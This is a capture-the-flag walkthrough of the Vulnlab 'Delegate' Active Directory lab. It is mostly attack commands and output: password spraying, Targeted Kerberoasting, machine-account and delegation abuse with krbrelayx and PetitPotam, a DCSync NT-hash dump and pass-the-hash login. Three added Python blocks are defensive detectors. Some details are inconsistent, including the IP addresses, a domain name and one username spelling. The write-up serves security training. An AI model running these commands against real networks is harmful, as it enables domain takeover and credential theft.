Detailed Findings and Recommendations

Delegate is a medium-difficulty machine on Vulnlab that starts with the enumeration of SMB shares to discover user credentials. Those credentials gave control of a user holding GenericWrite over another user object, which was abused through Targeted Kerberoasting. The SeEnableDelegation privilege held by that second user led to an Unconstrained Delegation attack, culminating in a DCSync to obtain domain controller access.

Machine ID | IP | Domain | DC
Delegate | 10.10.89.126 | delegate.vl | dc.sendai.vl

Phase 1: Enumeration

Port Scanning

sudo nmap -sC -sV -oA delegate 10.10.89.126
  • -sC: Runs default Nmap scripts.
  • -sV: Detects service versions.
  • -oA: Outputs in all formats (normal, XML, and grepable) and saves with the prefix delegate.
Port | Service | Version
53 | domain | Simple DNS Plus
88 | kerberos-sec | Microsoft Windows Kerberos
135 | msrpc | Microsoft Windows RPC
139 | netbios-ssn | Microsoft Windows netbios-ssn
389 | ldap | Microsoft Windows Active Directory LDAP
445 | microsoft-ds? |
464 | kpasswd5? |
593 | ncacn_http | Microsoft Windows RPC over HTTP 1.0
636 | tcpwrapped |
3268 | ldap | Microsoft Windows Active Directory LDAP
3269 | tcpwrapped |
3389 | ms-wbt-server | Microsoft Terminal Services

- DNS_Domain_Name: delegate.vl
- Product_Version: 10.0.20348
- DNS_Computer_Name: DC1.delegate.vl
- NetBIOS_Computer_Name: DC1
- NetBIOS_Domain_Name: DELEGATE

Editing /etc/hosts

Add the following entry to /etc/hosts

10.10.89.126 dc1.delegate.vl delegate.vl

SMB Enumeration (Port 445)

cme smb 10.10.89.126 -u 'guest' -p '' --shares
  • cme smb: CrackMapExec module for SMB enumeration.
  • -u 'guest' -p '': Using the guest account with an empty password.
  • --shares: Lists shared resources.

Share Access

As we can see, the guest user has read access to a few shares on the DC. The next logical step is to determine if these readable shares contain useful information that can help us identify a way to gain initial access to the system.

smbclient.py 'guest@10.10.89.126'
  • smbclient.py: A tool to interact with SMB shares.
  • guest@10.10.103.222: Connect using the guest account.

In the SYSVOL share, under delegate.vl\scripts\, we found a users.bat file.

rem @echo off
net use * /delete /y
net use v: \\dc1\development 
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator P4ssw0rd1#123
  • The batch file first deletes all existing network connections.
  • It then maps the network share \\dc1\development to the v: drive.
  • If the current user is A.Briggs, it additionally maps the network share \\fileserver\backups to the h: drive using the Administrator credentials.

So our enumeration so far gives us some valuable information:

  • The script is likely a logon script that runs whenever a user logs in to the domain, maps the share \\dc1\development to v:, and checks whether the user is A.Briggs; if so, it additionally maps the \\fileserver\backups share by supplying the Administrator credentials in clear text.
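From a defensive angle, logon scripts in SYSVOL are readable by every domain user, so an embedded credential like the one in users.bat is worth hunting for across the whole scripts folder rather than stumbling on by hand. The following Python scanner is an added example, not part of the original write-up or of any tool it uses: it parses a batch script for `net use` lines that carry a literal password next to a `/user:` switch, skipping comments and the `*` prompt placeholder. The script content it runs on is constructed, with the share names from the page and placeholder credential values.

```python
import re
from dataclasses import dataclass
from typing import List

# Constructed sample of a logon script shaped like the users.bat found in SYSVOL above.
# Share names mirror the page; the credential values are placeholders, not real secrets.
SAMPLE_SCRIPT = r"""rem @echo off
net use * /delete /y
net use v: \\dc1\development
if %USERNAME%==A.Briggs net use h: \\fileserver\backups /user:Administrator ExamplePass1!
net use z: \\fs2\archive * /user:corp\svc_backup
NET USE y: \\fs3\data Winter2023 /user:corp\svc_report /persistent:yes
"""


@dataclass
class Finding:
    line_no: int
    share: str
    user: str
    password: str


NET_USE_RE = re.compile(r"\bnet\s+use\b", re.IGNORECASE)
DRIVE_RE = re.compile(r"[A-Za-z*]:")   # "h:" or the "*" wildcard drive letter
SWITCH_PREFIX = "/"


def scan_batch_script(text: str) -> List[Finding]:
    """Return every 'net use' line that embeds a literal password next to a /user: switch."""
    findings: List[Finding] = []
    for line_no, raw in enumerate(text.splitlines(), start=1):
        line = raw.strip()
        # batch comments start with REM or ::
        if not line or line.lower().startswith(("rem ", "::")):
            continue
        m = NET_USE_RE.search(line)      # 'net use' may follow an IF condition
        if not m:
            continue
        tokens = [t.strip('"') for t in line[m.end():].split()]
        share = next((t for t in tokens if t.startswith("\\\\")), None)
        user = next((t[len("/user:"):] for t in tokens if t.lower().startswith("/user:")), None)
        if share is None or user is None:
            continue
        # In 'net use' syntax the password is the bare token that is neither the drive,
        # the share nor a switch; "*" means "prompt for it", so it is not a stored secret.
        password = next(
            (t for t in tokens
             if t != share and not t.startswith(SWITCH_PREFIX) and not DRIVE_RE.fullmatch(t)),
            None,
        )
        if password and password != "*":
            findings.append(Finding(line_no, share, user, password))
    return findings


if __name__ == "__main__":
    for f in scan_batch_script(SAMPLE_SCRIPT):
        print(f"line {f.line_no}: {f.user} -> {f.share} (password stored in clear text)")
```

Pointed at a mounted copy of SYSVOL, the same function can be run over every .bat and .cmd file under the scripts folder; a hit means the credential is readable by any authenticated user and should be rotated, not just removed from the script.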

Enumerating further with guest access, we perform a RID brute force to obtain a list of all available users.

cme smb 10.10.89.126 -u 'guest' -p '' --rid-brute

Usernames obtained through RID Bruteforce

Based on the enumeration, we have so far a list of users and one single password credential.

Username | Password
Administrator | P4ssw0rd1#123
A.Briggs |
b.Brown |
R.Copper |
J.Roberts |
N.Thompson |

We now create a users.txt and a passwords.txt file, which we can use to perform a password spraying attack.

cme smb 10.10.89.126 -u 'users.txt' -p 'users.txt' --no-bruteforce --continue-on-success

We start by password spraying in username:username format. This gave us one successful login for user R.Copper.

Successful login for user R.Copper

cme smb 10.10.89.126 -u 'users.txt' -p 'passwords.txt' --continue-on-success

We then move to password spraying in username:password format. This gave us two successful login attempts, one for the user A.Briggs and a second again for the user R.Copper. This leads me to believe that the user R.Copper likely has a misconfigured or default setup, allowing any password to be used for login. This could be a temporary account with relaxed security policies.

Successful login for user A.Briggs

Successful login for user R.Copper

To check our assumption that R.Copper may be a misconfigured or temporary account, we spray the users again with an empty password.

cme smb 10.10.89.126 -u 'users.txt' -p '' --continue-on-success

And indeed, user R.Copper accepts any password supplied to it.

Successful login for user R.Copper

So we now have the following list of usernames and passwords.

Username | Password | Login Status
Administrator | P4ssw0rd1#123 | False
A.Briggs | P4ssw0rd1#123 | True
b.Brown | | False
R.Copper | (guest account) | True
J.Roberts | | False
N.Thompson | | False

Now, with the A.Briggs credentials, we enumerate the SMB shares again.

cme smb 10.10.89.126 -u 'A.Briggs' -p 'P4ssw0rd1#123' --shares 

Based on the results, user A.Briggs has the same access to the shares as the guest user.

Share Access for A.Briggs

No further information can be extracted through the SMB shares, so we move on to LDAP enumeration.

LDAP - Port 389 Enumeration

Bloodhound Scan

We start by running a BloodHound collection using cme.

cme ldap 10.10.89.126 -u 'A.Briggs' -p 'P4ssw0rd1#123' --bloodhound -c All -ns 10.10.89.126

Now we upload the zip file created by the above command into BloodHound and look for an attack path.

In BloodHound we find a path to initial shell access on DC1.DELEGATE.VL.

Attack Path for Initial Access

Resource Development

  • Based on our enumeration we have an attack path to PSRemote into DC1.DELEGATE.VL using the N.THOMPSON@DELEGATE.VL account.
  • We have control over A.BRIGGS@DELEGATE.VL, whose credentials we obtained during the enumeration phase.
  • A.BRIGGS has GenericWrite access over the user N.THOMPSON.

To PSRemote into DC1.DELEGATE.VL using the N.THOMPSON account we can use Targeted Kerberoasting.

Targeted Kerberoasting

  • This abuse can be carried out when controlling an object that has a GenericAll, GenericWrite, WriteProperty or Validated-SPN over the target.
  • The attacker can add an SPN (ServicePrincipalName) to that account.
  • Once the account has an SPN, it becomes vulnerable to Kerberoasting. This technique is called Targeted Kerberoasting.
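The defensive counterpart to the technique described above is to watch for SPNs being added to user objects by anyone outside the small set of principals who legitimately manage service accounts, and to correlate that with RC4 (etype 0x17) TGS requests for the same account, which is what produces a `$krb5tgs$23$` hash. The Python below is an added example, not part of the write-up or of targetedKerberoast.py; it works over constructed Directory Service Changes (5136) and TGS request (4769) records with placeholder SPN values and times. The `%%14674` operation type and the field names are the ones Windows writes into those events; the trusted-subject allow-list is an assumption about the environment.

```python
from typing import Dict, Iterable, List

VALUE_ADDED = "%%14674"   # OperationType that Windows writes into 5136 for "Value Added"
VALUE_DELETED = "%%14675"
RC4_HMAC = "0x17"         # TicketEncryptionType for RC4-HMAC, the etype behind $krb5tgs$23$ hashes

# Constructed sample of 5136 (directory object modified) and 4769 (TGS requested) records.
# Names mirror the write-up; the SPN value, times and addresses are placeholders.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"time": "2024-01-10T11:00:00", "EventID": "5136", "SubjectUserName": "svc_spnadmin",
     "ObjectDN": "CN=svc_sql,CN=Users,DC=delegate,DC=vl", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "MSSQLSvc/sql01.delegate.vl:1433", "OperationType": VALUE_ADDED},
    {"time": "2024-01-10T11:05:00", "EventID": "5136", "SubjectUserName": "A.Briggs",
     "ObjectDN": "CN=N.Thompson,CN=Users,DC=delegate,DC=vl", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "http/placeholder-spn-4f2a", "OperationType": VALUE_ADDED},
    {"time": "2024-01-10T11:05:02", "EventID": "4769", "ServiceName": "N.Thompson",
     "TicketEncryptionType": "0x17", "IpAddress": "192.0.2.10"},
    {"time": "2024-01-10T11:05:03", "EventID": "5136", "SubjectUserName": "A.Briggs",
     "ObjectDN": "CN=N.Thompson,CN=Users,DC=delegate,DC=vl", "ObjectClass": "user",
     "AttributeLDAPDisplayName": "servicePrincipalName",
     "AttributeValue": "http/placeholder-spn-4f2a", "OperationType": VALUE_DELETED},  # cleanup
    {"time": "2024-01-10T11:10:00", "EventID": "4769", "ServiceName": "svc_sql",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.89.50"},  # AES256, ordinary use
]


def rdn_value(dn: str) -> str:
    """Leaf RDN value of a DN, e.g. 'N.Thompson' from 'CN=N.Thompson,CN=Users,...'."""
    return dn.split(",", 1)[0].split("=", 1)[1]


def find_targeted_kerberoast(events: Iterable[Dict[str, str]],
                             trusted_subjects: Iterable[str] = ()) -> List[Dict[str, object]]:
    """Alert on every SPN added to a user object by a non-trusted subject, and note whether
    an RC4 service ticket for that account was requested afterwards."""
    ordered = sorted(events, key=lambda e: e["time"])
    trusted = {s.lower() for s in trusted_subjects}
    alerts: List[Dict[str, object]] = []
    for i, e in enumerate(ordered):
        if e.get("EventID") != "5136" or e.get("OperationType") != VALUE_ADDED:
            continue
        if e.get("ObjectClass", "").lower() != "user":
            continue
        if e.get("AttributeLDAPDisplayName", "").lower() != "serviceprincipalname":
            continue
        if e["SubjectUserName"].lower() in trusted:
            continue
        account = rdn_value(e["ObjectDN"])
        # a later 4769 for this account with etype 0x17 is the roast itself
        roasted = any(
            f.get("EventID") == "4769"
            and f.get("ServiceName", "").lower() == account.lower()
            and f.get("TicketEncryptionType", "").lower() == RC4_HMAC
            for f in ordered[i + 1:]
        )
        alerts.append({"account": account, "spn": e["AttributeValue"],
                       "added_by": e["SubjectUserName"], "rc4_tgs_requested": roasted})
    return alerts


if __name__ == "__main__":
    for a in find_targeted_kerberoast(SAMPLE_EVENTS, trusted_subjects={"svc_spnadmin"}):
        print(f"SPN {a['spn']} added to {a['account']} by {a['added_by']}; "
              f"RC4 TGS requested afterwards: {a['rc4_tgs_requested']}")
```

Event 5136 only fires when the Directory Service Changes audit subcategory is enabled and a SACL covering writes to the user objects is in place; without that, the RC4 4769 request is the only signal left, and the fix that removes it is giving service accounts AES-only keys and long random passwords.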

To perform this attack from a Linux system we need the targetedKerberoast.py script.

targetedKerberoast.py -v -d $DOMAIN_FQDN -u $USER -p $PASSWORD

Initial Access

Targeted Kerberoasting

In the resource development section we downloaded the targetedKerberoast.py script. Now we use it to obtain the hash for the N.THOMPSON account and crack it offline with hashcat. We then use the cracked password to PSRemote into DC1.

python3 ./targetedKerberoast.py -v -d Delegate.vl -u 'A.Briggs' -p 'P4ssw0rd1#123'

Running this command, we obtained the hash for the N.THOMPSON user.

$krb5tgs$23$*N.Thompson$DELEGATE.VL$Delegate.vl/N.Thompson*$a79b8e0f02615db8c7369c34e47a10ee$[remainder of hash truncated]

We now try to crack the obtained hash using hashcat.

hashcat n.thompson_hash /usr/share/wordlists/rockyou.txt

hashcat successfully cracked the password for N.THOMPSON: KALEB_2341. This shows a weakness in the account password policy, as the user's password was weak and easily cracked with the rockyou.txt word-list. We update our username:password list as follows.

Username | Password | Login Status | Method
Administrator | P4ssw0rd1#123 | False | Enumeration
A.Briggs | P4ssw0rd1#123 | True | Enumeration
b.Brown | | False | N/A
R.Copper | (guest account) | True | Enumeration
J.Roberts | | False | N/A
N.Thompson | KALEB_2341 | True | Targeted Kerberoasting

Now we use the N.Thompson credentials to PSRemote into DC1 using evil-winrm.

evil-winrm -i dc1.delegate.vl -u n.thompson -p 'KALEB_2341'

The screenshot below shows our initial shell on dc1.delegate.vl.

Initial Shell as N.THOMPSON

Host Reconnaissance

BloodHound shows nothing further for user n.thompson beyond its group membership:

N.Thompson Group Membership

Looking at the description of the group Delegation Admins, it shows us the following information.

Node Properties of Delegation Admins Group

Based on the above information, we assume that the user N.Thompson has some kind of delegation rights.

Check the privileges of User

whoami /all

This gives us interesting information and confirms our assumption: user N.Thompson holds the delegation privilege SeEnableDelegationPrivilege.

Access Tokens for N.Thompson

From the above output we learn two useful facts.

  • User N.Thompson can add a machine account in the domain.
  • User N.Thompson can enable computer and user accounts to be trusted for delegation.

Resource Development for Privilege Escalation

The information from host reconnaissance tells us that we might be able to perform an Unconstrained Delegation attack.

  • Delegation allows a user or machine to act on behalf of another user towards another service.
  • We can create a machine account and enable the delegation flag on the newly created machine account.
  • When unconstrained delegation is enabled on a machine account, the KDC (Domain Controller) includes a copy of the user's TGT inside the TGS whenever a user accesses any service on that machine.
  • So, if an admin accesses a file share or any other service on the machine, their TGT is cached on it.
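The flag that bloodyAD sets in the privilege escalation below is the TRUSTED_FOR_DELEGATION bit of userAccountControl. Decoding that attribute is how a defender finds unconstrained delegation after the fact: domain controllers carry the bit by design, and anything else that does is a finding. The following Python is an added example, not from the write-up or from bloodyAD; the flag table is Microsoft's documented userAccountControl bit layout, and the account list is a constructed stand-in for what an LDAP query returning sAMAccountName and userAccountControl would produce (the attacker$ entry mirrors the machine account created later on the page).

```python
from typing import Dict, List

# userAccountControl bit names as documented by Microsoft.
UAC_FLAGS: Dict[int, str] = {
    0x0001: "SCRIPT", 0x0002: "ACCOUNTDISABLE", 0x0008: "HOMEDIR_REQUIRED", 0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD", 0x0040: "PASSWD_CANT_CHANGE", 0x0080: "ENCRYPTED_TEXT_PWD_ALLOWED",
    0x0100: "TEMP_DUPLICATE_ACCOUNT", 0x0200: "NORMAL_ACCOUNT", 0x0800: "INTERDOMAIN_TRUST_ACCOUNT",
    0x1000: "WORKSTATION_TRUST_ACCOUNT", 0x2000: "SERVER_TRUST_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD", 0x20000: "MNS_LOGON_ACCOUNT", 0x40000: "SMARTCARD_REQUIRED",
    0x80000: "TRUSTED_FOR_DELEGATION",            # unconstrained delegation
    0x100000: "NOT_DELEGATED", 0x200000: "USE_DES_KEY_ONLY", 0x400000: "DONT_REQ_PREAUTH",
    0x800000: "PASSWORD_EXPIRED",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",  # constrained delegation with protocol transition
    0x4000000: "PARTIAL_SECRETS_ACCOUNT",
}
TRUSTED_FOR_DELEGATION = 0x80000
SERVER_TRUST_ACCOUNT = 0x2000        # set on domain controllers
TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000


def decode_uac(value: int) -> List[str]:
    """Expand a userAccountControl integer into its flag names, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


# Constructed sample of (sAMAccountName, userAccountControl) pairs, as an LDAP query would return them.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "DC1$", "userAccountControl": 532480},       # 0x82000: DC, unconstrained by design
    {"sAMAccountName": "WS01$", "userAccountControl": 4096},         # 0x1000: ordinary workstation
    {"sAMAccountName": "attacker$", "userAccountControl": 528384},  # 0x81000: workstation + TRUSTED_FOR_DELEGATION
    {"sAMAccountName": "N.Thompson", "userAccountControl": 512},     # 0x200: normal user
    {"sAMAccountName": "svc_web", "userAccountControl": 16777728},  # 0x1000200: user + protocol transition
]


def audit_delegation(accounts) -> List[Dict[str, object]]:
    """Report accounts that can impersonate users: unconstrained delegation on anything that is
    not a DC, and constrained delegation with protocol transition (S4U2Self) anywhere."""
    findings: List[Dict[str, object]] = []
    for acct in accounts:
        uac = int(acct["userAccountControl"])
        name = acct["sAMAccountName"]
        if uac & TRUSTED_FOR_DELEGATION and not uac & SERVER_TRUST_ACCOUNT:
            findings.append({"account": name, "issue": "unconstrained delegation on a non-DC account",
                             "flags": decode_uac(uac)})
        if uac & TRUSTED_TO_AUTH_FOR_DELEGATION:
            findings.append({"account": name, "issue": "constrained delegation with protocol transition",
                             "flags": decode_uac(uac)})
    return findings


if __name__ == "__main__":
    for f in audit_delegation(SAMPLE_ACCOUNTS):
        print(f"{f['account']}: {f['issue']} ({', '.join(f['flags'])})")
```

Run against a real export, the same check also catches the preconditions for the attack rather than only its result: an account holding SeEnableDelegationPrivilege is what makes flipping this bit possible, so that right should be confined to domain admins, and privileged users should carry NOT_DELEGATED (or sit in Protected Users) so their TGT is never forwarded to a delegating host in the first place.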

For more detailed information, see dirkjanm's post on relaying Kerberos. We will also use the bloodyAD tool to modify the UAC flags on the machine account.

Privilege Escalation

To perform the privilege escalation we follow the steps shown in the table below.

Step | Action
Step 1 | Add Machine Account
Step 2 | Modify DNS records
Step 3 | Modify UAC
Step 4 | Add SPN to Machine Account

Adding a machine account

addcomputer.py -dc-ip 10.10.89.113 -computer-pass Password123 -computer-name attacker delegate.vl/N.Thompson:'KALEB_2341'

Added Machine Account

Modifying the DNS records

python3 dnstool.py -u 'delegate.vl\attacker$' -p 'Password123' -r attacker.delegate.vl -d 10.8.2.41 --action add 'DC1.delegate.vl' -dns-ip 10.10.89.113

Added DNS Entry

Modifying the UAC

./bloodyAD.py -u 'N.Thompson' -d 'delegate.vl' -p 'KALEB_2341' --host 'DC1.delegate.vl' add uac 'attacker$' -f TRUSTED_FOR_DELEGATION

UAC modified

Adding SPN to machine account

python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/attacker.delegate.vl' -t 'attacker$' -dc-ip 10.10.89.113 DC1.delegate.vl --additional
python3 ./addspn.py -u 'delegate.vl\N.Thompson' -p 'KALEB_2341' -s 'cifs/attacker.delegate.vl' -t 'attacker$' -dc-ip 10.10.89.113 DC1.delegate.vl

SPN Added Successfully

Converting the machine account password to an NT hash using CyberChef

Starting krbrelayx

python3 krbrelayx.py -hashes :58a478135a93ac3bf058a5ea0e8fdb71

Coerce using PetitPotam

python3 PetitPotam.py -u 'attacker$' -p 'Password123' attacker.delegate.vl 10.10.89.113

Setting the ccache

export KRB5CCNAME=DC1\$@DELEGATE.VL_krbtgt@DELEGATE.VL.ccache

DCSync against the Domain Controller

secretsdump.py 'DC1$'@DC1.delegate.vl -k -no-pass
Administrator:500:aad3b435b51404eeaad3b435b51404ee:c32198ceab4cc695e65045562aa3ee93:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:54999c1daa89d35fbd2e36d01c4a2cf2:::
A.Briggs:1104:aad3b435b51404eeaad3b435b51404ee:8e5a0462f96bc85faf20378e243bc4a3:::
b.Brown:1105:aad3b435b51404eeaad3b435b51404ee:deba71222554122c3634496a0af085a6:::
R.Cooper:1106:aad3b435b51404eeaad3b435b51404ee:17d5f7ab7fc61d80d1b9d156f815add1:::
J.Roberts:1107:aad3b435b51404eeaad3b435b51404ee:4ff255c7ff10d86b5b34b47adc62114f:::
N.Thompson:1108:aad3b435b51404eeaad3b435b51404ee:4b514595c7ad3e2f7bb70e7e61ec1afe:::
DC1$:1000:aad3b435b51404eeaad3b435b51404ee:dd7e290670e942bd2a7cefa97ba07a5c:::
attacker$:3101:aad3b435b51404eeaad3b435b51404ee:58a478135a93ac3bf058a5ea0e8fdb71:::

Final Access with Evil-WinRM

evil-winrm -i dc1.delegate.vl -u administrator -H 'c32198ceab4cc695e65045562aa3ee93'